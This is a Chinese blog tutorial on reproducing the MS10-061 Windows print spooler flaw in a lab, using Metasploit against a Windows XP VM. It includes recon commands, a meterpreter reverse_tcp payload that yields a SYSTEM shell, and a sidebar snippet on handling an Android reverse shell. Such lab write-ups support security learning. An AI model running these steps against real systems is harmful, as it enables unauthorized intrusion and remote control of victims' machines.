Kali利用msf对MS10_061漏洞进行渗透测试

最新推荐文章于 2024-04-26 20:05:58 发布
最新推荐文章于 2024-04-26 20:05:58 发布
阅读量1.8k 收藏 30
点赞数 6
分类专栏: # 漏洞复现 文章标签: 安全
原文链接:https://blog.csdn.net/qq_39991837/article/details/103728156?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-2.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogComme
版权

注意事项:

  • kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待!
  • 本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!!
1. Metasploit简介

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。详细介绍可以参考百度百科对 Mettasploit 的介绍。

2.打印后台程序服务模拟漏洞(CVE-2010-2729/MS10-061)

利用MSF中的攻击模块:ms10_061_spoolss,Windows打印后台程序没有充分的限制访问该服务的用户权限,攻击者可以通过提交特制的打印请求在Windows系统目录(%SystemRoot%\system32)中创建文件。攻击者可以指定任何文件名,包括目录遍历,通过WritePrinter请求,攻击者可以完全控制创建文件的内容。将文件写入到Windows系统目录(%SystemRoot%\system32)后,通过WMI来部署恶意程序,因为系统会自动运行%SystemRoot%\System32\Wbem\MOF文件夹的mof文件、执行命令。
该漏洞首次被发现并被利用于著名的Stuxnet蠕虫(俗称“震网”)

3.实验环境

VMware虚拟环境
攻击机:Kali Linux;目标机:Windows xp sp2

4.实验步骤

4.1 使用Nmap扫描目标机器是否存在NetBiosRPC服务
4.2 NetBios共享检测
4.3 使用MSF的ms10_061_spoolss模块攻击目标机

5.设置目标机环境
  1. 获取目标机IP在这里插入图片描述
  2. 创建打印共享(默认是没有打印共享)
    1)代开控制面板,选择打印机和其他硬件在这里插入图片描述2)选择打印机和传真在这里插入图片描述
    3)添加打印机在这里插入图片描述4)本地打印机,不勾选“自动检测并安装即插即用打印机”在这里插入图片描述
    5)选择使用LPT1端口在这里插入图片描述
    随便选一个打印机厂商和型号在这里插入图片描述取个名字在这里插入图片描述选择共享打印机在这里插入图片描述
6.在Kali上检测打印机

1)nmap扫描

nmap -sS -sU -O -p127-139,445 192.168.230.137

 
 

 
 
  • 1

在这里插入图片描述
2)查找NetBIOS

nmblookup -A 192.168.230.137

 
 

 
 
  • 1

在这里插入图片描述
NetBIOS工作站名字:123-13DFCFEDD88
NetBIOS组名:WORKGROUP

7.访问SMB资源
smbclient -L \\123-13DFCFEDD88 -I 192.168.230.137 -N

 
 

 
 
  • 1


看到了打印共享

8.使用MSF模块攻击

1)载入模块,搜索一下ms10_061在这里插入图片描述
2)利用漏洞,并查看需要配置的参数
在这里插入图片描述
3)配置参数在这里插入图片描述4)设置Payload

set payload windows/meterpreter/reverse_tcp

 
 

 
 
  • 1

5)设置Payload参数在这里插入图片描述6)攻击在这里插入图片描述攻击完成后,建立了远程会话,恶意程序写入到目标机的%SystemRoot%\system32\2Uy3ygTXtpVrWD.exe,恶意程序是通过%SystemRoot%\system32\wbem\mof\5V4jdMrNNFWWSH.mof控制运行的。
7)接下来可以执行一系列操作
getuidgetpid在这里插入图片描述
可以看到我们获取了系统的system权限

此时执行shell可以进入目标机的命令行界面在这里插入图片描述
至此,整个攻击过程已经大体结束,之后可以进行取证等一系列工作。最后感谢各位的阅读,由于本人水平有限,如有不足,敬请谅解。

zxl2605
关注
  • 6
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试Kali如何利用CVE-2019-0708漏洞渗透Win7
玩电脑的辣条哥的博客
01-17 982
1.攻击者IP:192.168.1.10系统: KALI2022(vmware 16.0)2.靶机IP:192.168.1.8系统:Windows 7 6.1.7601 Service Pack 1 Build 7601已开启远程协助RDP服务开启了3389端口。
ms10-061打印后台程序服务远程代码执行漏洞 成功复现xp&win7
田一柠的博客
12-15 1818
漏洞介绍 Windows打印后台程序没有充分限制访问该服务的用户权限,攻击者可以通过提交特制的打印请求在windows系统目录(%SystemRoot%\system32)中创建文件。 攻击者可指定任意文件名,包括目录遍历,通过发送WritePrinter请求,攻击者可以完全控制创建文件的内容。 将文件写入到windows系统目录后,通过WMI来部署恶意程序,因为系统会自动运行%SYstemRoot%\System32\Wbem\MOF文件夹的mof文件、执行命令。 该漏洞首次被发现并应用于著名的S
kali的实战渗透
12-14
写的是kali的实战渗透,其中有讲msf渗透,kali基础命令使用等等等,非常多
如何利用Kali Linux进行网站渗透测试:最常用工具详解
weixin_43263566的博客
05-13 6162
Kali Linux 2022.4虚拟机中常用的渗透测试工具介绍
Kali——Meterpreter后渗透攻击模块-Metasploit的module模块衍生
qq_63167128的博客
03-07 825
​ 介绍:本文展示了Meterpreter作为Metasploit模块之一的简要概念讲解及攻击流程(也可以在windows系统中下载metasploit工具进行相关操作),工具详细教程可在Sangfor学习平台获取临时免费课程进行学习。 挂个链接:深信服产业教育中心 Meterpreter模块作为后渗透攻击(该阶段通常从攻陷了目标的一些系统和获取了一部分区域系统管理权限后开始)模块的实施通道,可以根据渗透目标需求进行灵活拓展,涉及范围:信息收集,口令攫取,权限提升,内网拓展等等 ​
网络安全-kail linux渗透测试(基础篇)
2201_75719295的博客
05-20 556
《Metasploit渗透测试指南》肯尼(行业经典) 《Metaslpoit渗透测试魔鬼训练营》诸葛建伟(国内经典)《网络攻击技术与实践》诸葛建伟(清华大学网络安全课)Mindmanager笔记 《Metasploit渗透测试从入门到精通》陈鑫杰PingingLab内部教学版③PPT讲义 《网络攻击技术与实践》PPT(清华大学网络安全课)
kali linux渗透测试 第二章(2)sql简单绕过处理(ctf题目实例)
maluxiao123的博客
08-12 579
实验环境为win2003+phpstudy+php+mysql 要利用sql漏洞读取/tmp/360/key的文件,进入答题后发现会直接返回sql语句 在域名上我们可以看到有id=1的字符输入空格union空格select后返回如下 发现空格和union都没有显示,说明字符被过滤掉了,这时候我们就需要进行绕过,绕过的方式有改变大小写(如union->Union),双写(uniunionon在关键字中任意位置再插入一个),url编码(union-->%75%6E%69%6F%6.
MS08067,MS10061漏洞靶机环境搭建.docx
07-07
MS08067,MS10061漏洞靶机环境搭建过程,演示靶机的搭建过程,用于攻防演练,渗透小白可以看一下
MS08067/MS10061漏洞靶机环境搭建总结
热门推荐
SQL_injection的专栏
08-15 1万+
MS08067/MS10061漏洞靶机环境搭建总结
Kali渗透测试:对软件的溢出漏洞进行测试
Liu_Bruce的博客
05-20 680
Kali渗透测试:对软件的溢出漏洞进行测试 如何对一个软件进行渗透,渗透目标是FreeFloat FTP Server, 这是一款十分简单的FTP服务器软件。FreeFloat FTP Server会在运行的主机上建立一个FTP服务器,其他计算机上的用户可以登录这个FTP服务器来存取文件。如我们在IP地址为192.168.68.160的主机的C盘中运行FreeFloat FTP Server,在另一台计算机中可以使用FTP下载工具或者命令的方式对其进行访问。这里我们采用命令的方式对其进行访问,如下图所示:
Kali Linux高级渗透测试 _2016.05_罗伯特_KaliLinux高级渗透测试_渗透_完整版_
09-29
P226
kali linux安全渗透教程_网络攻防_安全测试_KaliLinux安全渗透_
10-02
详细介绍如何使用kali linux进行网络攻防,渗透测试
python实验一 使用KALI进行MS17_010渗透提权
04-09
华东交通大学网络安全软件开发python实验一
kali_linux渗透测试视频教程(10套教程).txt
04-06
10套独家渗透测试视频教程,熟练掌握Kali_Linux及metasploit渗透测试工具及渗透测试实战技巧,另赠送Kali_Linux web渗透测试实战教材一套,metasploit渗透测试魔鬼训练营教材一套。
kali无线渗透测试入门指南_有关渗透的知识_
09-29
Linux渗透知识 ,可以学到更多东西 建议查看
全视通智慧手术室对讲方案,让手术更安全更高效
2301_78035670的博客
04-24 491
全视通智慧手术室对讲方案通过整合等候区公告屏、医护主机、手术间门口机、复苏室主机等多个模块和设备,专用于手术室、护士站、谈话间、复苏室、器械室和其他协同部门,实现了对手术流程的全面管理和监控。
跨境电商测评攻略:如何安全有效地提升业绩?
zcwz888的博客
04-23 363
但自养号需要解决技术层面的问题,如果是买设备或者软件这种,可能上一秒还能用,下一秒就因为平台风控的原因批量封号,因为平台会通过ip 获取到设备的型号,地区码,监管码,主板码,WIFI地址,甚至是颜色,指纹码,IP地址等等大概几十个参数,参数关联后,触发平台机审,导致的砍单,封号。这时候要好好规划一下测评的事情,做美客多到最后你会发现,测评是最有效果的,因为测评的本质就是玩弄流量,模仿用户的真实行为让流量变得更多,从而得到跨境电商平台规则的加成,竞争激烈的产品不测评和别人竞争。
网络安全实训Day16
最新发布
Yisitelz的博客
04-26 399
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
使用kali 中的msf对自己的手机进行渗透的完整指令
06-11
在使用 Metasploit 渗透测试工具进行攻击前,需要明确一点:您必须拥有目标手机的授权。否则,您的行为将违反法律法规,承担法律责任。 以下是在 Kali 中使用 Metasploit 渗透测试工具对 Android 手机进行攻击的一般步骤: 1. 打开终端,输入 `msfconsole` 命令启动 Metasploit 控制台。 2. 在 Metasploit 控制台中,输入 `use exploit/multi/handler` 命令,选择要使用的 exploit 模块。 3. 设置监听器参数,包括 `LHOST`(监听主机的 IP 地址)和 `LPORT`(监听的端口号)。例如,输入 `set LHOST 192.168.0.100` 和 `set LPORT 4444` 命令设置监听器。 4. 输入 `exploit` 命令启动监听器,并等待目标手机连接。 5. 在目标手机上安装 Metasploit 的反向 shell 客户端。可以使用 Metasploit 中的 `android/meterpreter/reverse_tcp` 模块生成反向 shell 客户端,或者使用其他工具生成。将反向 shell 客户端安装在目标手机上。 6. 反向 shell 客户端连接到监听器后,您就可以在 Metasploit 控制台中执行一些命令,例如 `meterpreter > sysinfo` 命令查看目标手机的系统信息,或者 `meterpreter > shell` 命令在目标手机上打开一个 shell 终端。 请注意,这只是一般的步骤,实际操作中可能会因为目标手机的不同而有所不同。而且,再次强调,您必须拥有目标手机的授权才能进行渗透测试,否则将涉嫌违法行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值